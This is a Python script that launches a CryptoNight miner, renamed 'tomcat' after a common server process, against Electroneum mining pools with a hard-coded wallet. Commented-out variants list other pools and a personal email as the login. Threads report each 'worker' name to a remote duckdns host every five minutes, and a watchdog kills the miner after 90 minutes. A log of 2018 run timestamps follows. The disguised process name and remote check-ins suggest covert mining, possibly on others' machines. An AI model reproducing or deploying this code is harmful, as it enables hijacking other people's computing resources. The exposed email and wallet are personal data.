import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:04.932549
#2018-02-17 16:33:07.374098
#2018-02-17 18:21:05.437779
#2018-02-17 20:09:01.782901
#2018-02-17 21:56:06.795404
#2018-02-17 23:41:05.383908
#2018-02-18 01:29:04.672355
#2018-02-18 03:16:04.944004
#2018-02-18 05:04:05.203158
#2018-02-18 06:57:05.350277
#2018-02-18 08:45:05.190542
#2018-02-18 10:32:02.107603
#2018-02-18 12:16:07.319914
#2018-02-18 14:03:01.838900
#2018-02-18 15:53:04.694971
#2018-02-18 17:42:07.335561
#2018-02-18 19:30:05.442096
#2018-02-18 21:15:07.427309
#2018-02-18 23:04:01.264993
#2018-02-19 00:51:03.415290
#2018-02-19 02:38:05.878789
#2018-02-19 04:24:06.675550
#2018-02-19 06:09:07.341015
#2018-02-19 07:57:07.390013
#2018-02-19 09:48:06.515835
#2018-02-19 11:38:01.716942
#2018-02-19 13:25:07.201421
#2018-02-19 15:13:05.570180
#2018-02-19 17:01:01.302829
#2018-02-19 18:47:08.809013
#2018-02-19 20:36:07.861650
#2018-02-19 22:24:04.256976
#2018-02-20 00:10:03.105962
#2018-02-20 01:58:04.998993
#2018-02-20 03:48:04.227509
#2018-02-20 05:33:03.875319
#2018-02-20 07:17:06.175343
#2018-02-20 09:03:01.396705
#2018-02-20 10:45:07.879100
#2018-02-20 12:33:08.039041
#2018-02-20 14:19:01.250868
#2018-02-20 16:02:06.625653
#2018-02-20 17:47:10.635086
#2018-02-20 19:38:07.476648
#2018-02-20 21:23:07.494848
#2018-02-20 23:07:07.376288
#2018-02-21 00:50:06.477149
#2018-02-21 02:37:06.247854
#2018-02-21 04:26:06.581230
#2018-02-21 06:13:01.468892
#2018-02-21 07:59:01.896153
#2018-02-21 09:44:05.976993
#2018-02-21 11:33:10.722095
#2018-02-21 13:21:08.508423
#2018-02-21 15:06:01.766650
#2018-02-21 16:55:10.035256
#2018-02-21 18:45:07.819433
#2018-02-21 20:33:04.284882
#2018-02-21 22:21:07.537002
#2018-02-22 00:11:02.128021
#2018-02-22 01:58:05.198192
#2018-02-22 03:45:09.728817
#2018-02-22 05:33:04.355940
#2018-02-22 07:18:01.428862
#2018-02-22 09:07:08.197896
#2018-02-22 10:54:07.910991
#2018-02-22 12:40:08.999935
#2018-02-22 14:26:05.721413
#2018-02-22 16:14:07.988072
#2018-02-22 18:01:11.580870
#2018-02-22 19:49:05.938302
#2018-02-22 21:39:07.194046
#2018-02-22 23:28:01.862903
#2018-02-23 01:16:03.707848
#2018-02-23 03:02:06.610897
#2018-02-23 04:49:02.118824
#2018-02-23 06:34:05.207671
#2018-02-23 08:22:01.939655
#2018-02-23 10:37:07.783257
#2018-02-23 12:31:05.427930
#2018-02-23 14:18:10.606232
#2018-02-23 16:09:08.074975
#2018-02-23 17:54:01.567163
#2018-02-23 19:40:09.596964
#2018-02-23 21:23:01.537349
#2018-02-23 23:10:08.256531
#2018-02-24 01:01:04.280590
#2018-02-24 02:55:01.720380
#2018-02-24 04:44:02.002134
#2018-02-24 06:29:07.506324
#2018-02-24 08:18:06.982253
#2018-02-24 10:04:04.122870
#2018-02-24 12:01:05.464897
#2018-02-24 13:49:03.731294
#2018-02-24 15:46:01.716440
#2018-02-24 17:42:01.570428
#2018-02-24 19:26:06.717201
#2018-02-24 21:16:03.909529
#2018-02-24 23:55:06.896195
#2018-02-25 04:02:07.684581
#2018-02-25 07:35:04.843603